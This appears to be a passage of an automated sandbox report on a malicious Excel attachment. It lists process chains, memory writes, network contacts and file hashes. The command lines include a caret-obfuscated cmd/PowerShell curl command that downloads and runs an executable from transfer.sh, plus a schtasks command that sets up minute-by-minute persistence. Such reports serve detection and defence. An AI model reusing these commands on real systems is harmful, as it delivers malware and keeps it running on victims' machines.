N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A
N/A N/A C:\Users\Public\l6hv4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Public\l6hv4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\l6hv4.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3292 wrote to memory of 4752 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 3292 wrote to memory of 4752 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4752 wrote to memory of 3004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 3004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3004 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\l6hv4.exe
PID 3004 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\l6hv4.exe
PID 3004 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 2196 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 3476 wrote to memory of 1452 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 1452 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 1452 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 824 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 824 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 824 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3456 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3456 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3456 N/A C:\Users\Public\l6hv4.exe C:\Windows\SysWOW64\cmd.exe
PID 824 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Users\Admin\AppData\Roaming\uno\uno.exe
PID 4436 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Roaming\uno\uno.exe C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3096 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3096 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 2196 wrote to memory of 1164 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 1164 wrote to memory of 1500 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 1164 wrote to memory of 1500 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe
PID 1164 wrote to memory of 1500 N/A C:\Users\Public\l6hv4.exe C:\Users\Public\l6hv4.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RomaniaRequestImunSRL092023_JC.xls"

C:\Windows\SYSTEM32\cmd.exe

cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/qyAOUa1rJz/Betro.e^xe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell /W 01 curl https://transfer.sh/get/qyAOUa1rJz/Betro.exe -o C:\Users\Public\l6hv4.exe;C:\Users\Public\l6hv4.exe

C:\Users\Public\l6hv4.exe

"C:\Users\Public\l6hv4.exe"

C:\Users\Public\l6hv4.exe

"C:\Users\Public\l6hv4.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c copy "C:\Users\Public\l6hv4.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

"C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd" /c copy "C:\Users\Admin\AppData\Roaming\uno\uno.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5068 -ip 5068

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 188

C:\Users\Public\l6hv4.exe

-a "C:\Users\Admin\AppData\Local\f9be9104\plg\v54SCiHA.json"

C:\Users\Public\l6hv4.exe

-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

C:\Users\Admin\AppData\Roaming\uno\uno.exe

"C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\uno"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd" /c copy "C:\Users\Admin\AppData\Roaming\uno\uno.exe" "C:\Users\Admin\AppData\Roaming\uno\uno.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\uno\uno.exe'" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 126.209.247.8.in-addr.arpa udp
NL 185.225.75.68:3569 tcp
US 8.8.8.8:53 68.75.225.185.in-addr.arpa udp
NL 185.225.75.68:3569 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.xenarmor.com udp
US 69.64.94.128:80 www.xenarmor.com tcp
US 8.8.8.8:53 128.94.64.69.in-addr.arpa udp
NL 185.225.75.68:3569 tcp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

memory/3292-0-0x00007FFB45F30000-0x00007FFB45F40000-memory.dmp

memory/3292-1-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-2-0x00007FFB45F30000-0x00007FFB45F40000-memory.dmp

memory/3292-3-0x00007FFB45F30000-0x00007FFB45F40000-memory.dmp

memory/3292-6-0x00007FFB45F30000-0x00007FFB45F40000-memory.dmp

memory/3292-5-0x00007FFB45F30000-0x00007FFB45F40000-memory.dmp

memory/3292-4-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-7-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-8-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-9-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-10-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-11-0x00007FFB435D0000-0x00007FFB435E0000-memory.dmp

memory/3292-12-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-13-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-15-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-14-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-16-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-17-0x00007FFB435D0000-0x00007FFB435E0000-memory.dmp

memory/3292-18-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-19-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-20-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-21-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-28-0x000002310DF80000-0x000002310E780000-memory.dmp

memory/3292-30-0x000002310DF80000-0x000002310E780000-memory.dmp

memory/3292-31-0x000002310DF80000-0x000002310E780000-memory.dmp

memory/3292-32-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tahbtkkl.cfd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3004-38-0x0000024840260000-0x0000024840282000-memory.dmp

memory/3004-43-0x00007FFB5A7A0000-0x00007FFB5B261000-memory.dmp

memory/3004-44-0x0000024827E20000-0x0000024827E30000-memory.dmp

memory/3292-45-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-46-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-48-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3004-49-0x0000024827E20000-0x0000024827E30000-memory.dmp

memory/3292-50-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-51-0x000002310DF80000-0x000002310E780000-memory.dmp

memory/3292-52-0x000002310DF80000-0x000002310E780000-memory.dmp

memory/3292-53-0x000002310DF80000-0x000002310E780000-memory.dmp

memory/3004-54-0x00007FFB5A7A0000-0x00007FFB5B261000-memory.dmp

memory/3004-55-0x0000024827E20000-0x0000024827E30000-memory.dmp

memory/3004-58-0x0000024827E20000-0x0000024827E30000-memory.dmp

memory/3004-59-0x0000024827E20000-0x0000024827E30000-memory.dmp

C:\Users\Public\l6hv4.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

C:\Users\Public\l6hv4.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/3004-68-0x00007FFB5A7A0000-0x00007FFB5B261000-memory.dmp

memory/3476-69-0x0000000074930000-0x00000000750E0000-memory.dmp

memory/3476-70-0x00000000000D0000-0x000000000086C000-memory.dmp

memory/3476-71-0x00000000059E0000-0x0000000005F84000-memory.dmp

memory/3476-72-0x0000000005420000-0x0000000005430000-memory.dmp

memory/3476-73-0x0000000006F90000-0x000000000771A000-memory.dmp

memory/2196-74-0x0000000000400000-0x00000000007CE000-memory.dmp

C:\Users\Public\l6hv4.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/2196-78-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-79-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3476-80-0x0000000074930000-0x00000000750E0000-memory.dmp

memory/2196-76-0x0000000000400000-0x00000000007CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\uno\uno.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/2196-83-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-84-0x0000000074840000-0x0000000074879000-memory.dmp

memory/2196-85-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-86-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-87-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-88-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-89-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-90-0x0000000000400000-0x00000000007CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\uno\uno.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/2196-92-0x0000000000400000-0x00000000007CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\uno\uno.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/2196-94-0x0000000074950000-0x0000000074989000-memory.dmp

memory/2196-95-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/4436-96-0x0000000073F30000-0x00000000746E0000-memory.dmp

memory/4436-97-0x0000000005A40000-0x0000000005A50000-memory.dmp

memory/2196-98-0x0000000000400000-0x00000000007CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\uno\uno.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/2196-101-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/4436-108-0x0000000073F30000-0x00000000746E0000-memory.dmp

memory/5068-107-0x0000000001200000-0x00000000015CE000-memory.dmp

memory/5068-112-0x0000000001200000-0x00000000015CE000-memory.dmp

memory/2196-113-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-114-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-117-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-118-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-119-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-120-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-121-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-123-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-124-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-125-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-126-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-127-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-128-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-129-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-130-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-131-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-132-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-133-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/2196-137-0x0000000000400000-0x00000000007CE000-memory.dmp

C:\Users\Public\l6hv4.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/1164-140-0x0000000000400000-0x00000000008DC000-memory.dmp

memory/1164-143-0x0000000000400000-0x00000000008DC000-memory.dmp

memory/1164-144-0x0000000000400000-0x00000000008DC000-memory.dmp

memory/1164-145-0x0000000000400000-0x00000000008DC000-memory.dmp

memory/2196-163-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/1500-170-0x0000000000400000-0x00000000006FE000-memory.dmp

C:\Users\Public\l6hv4.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/2196-171-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/1500-173-0x0000000000400000-0x00000000006FE000-memory.dmp

memory/1500-174-0x0000000000400000-0x00000000006FE000-memory.dmp

memory/1500-176-0x0000000000400000-0x00000000006FE000-memory.dmp

C:\Users\Public\Unknown.dll

MD5 86114faba7e1ec4a667d2bcb2e23f024
SHA1 670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256 568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512 d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

C:\Users\Public\Unknown.dll

MD5 86114faba7e1ec4a667d2bcb2e23f024
SHA1 670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256 568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512 d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

memory/1500-179-0x0000000010000000-0x0000000010227000-memory.dmp

C:\Users\Public\License.XenArmor

MD5 4f3bde9212e17ef18226866d6ac739b6
SHA1 732733bec8314beb81437e60876ffa75e72ae6cd
SHA256 212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174
SHA512 10b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744

memory/1500-197-0x0000000000400000-0x00000000006FE000-memory.dmp

memory/1500-198-0x0000000010000000-0x0000000010227000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\unk.xml

MD5 ce3e2f5f04eff81b3b7130a90a8e3a6e
SHA1 fe9ac39d1db0a28aeef54741003d3f639125dc1c
SHA256 b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631
SHA512 8cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357

C:\Users\Public\License.XenArmor

MD5 bf5da170f7c9a8eae88d1cb1a191ff80
SHA1 dd1b991a1b03587a5d1edc94e919a2070e325610
SHA256 e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd
SHA512 9e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e

memory/1164-224-0x0000000000400000-0x00000000008DC000-memory.dmp

memory/3292-231-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-233-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-234-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-235-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

memory/3292-236-0x00007FFB85EB0000-0x00007FFB860A5000-memory.dmp

C:\Users\Admin\AppData\Local\f9be9104\plg\v54SCiHA.json

MD5 ce3e2f5f04eff81b3b7130a90a8e3a6e
SHA1 fe9ac39d1db0a28aeef54741003d3f639125dc1c
SHA256 b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631
SHA512 8cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357

C:\Users\Admin\AppData\Roaming\uno\uno.exe

MD5 1c9f3c0258e923c07e1943498c789a3d
SHA1 e908faaa5eff19c6b653241253ecc6f28c83f436
SHA256 925329eac4d8dfc71dfd0d222e935b31fb340bbb70367c7abf6553d921b64e55
SHA512 92c16e56ae3d830e2110f97159d6f19fbf91b8bc56d29be207a0da12bd388a0fe68dd13c63dba5266d7d48be9f423d75c1e1e3ec16e6ad1458940f0bb0d0cb0b

memory/492-246-0x0000000073F30000-0x00000000746E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uno.exe.log

MD5 03febbff58da1d3318c31657d89c8542
SHA1 c9e017bd9d0a4fe533795b227c855935d86c2092
SHA256 5164770a37b199a79ccd23b399bb3309228973d9f74c589bc2623dc613b37ac4
SHA512 3750c372bbca1892e9c1b34681d592c693e725a8b149c3d6938079cd467628cec42c4293b0d886b57a786abf45f5e7229247b3445001774e3e793ff5a3accfa3

memory/492-248-0x0000000005A40000-0x0000000005A50000-memory.dmp

C:\Users\Admin\AppData\Roaming\uno\uno.exe

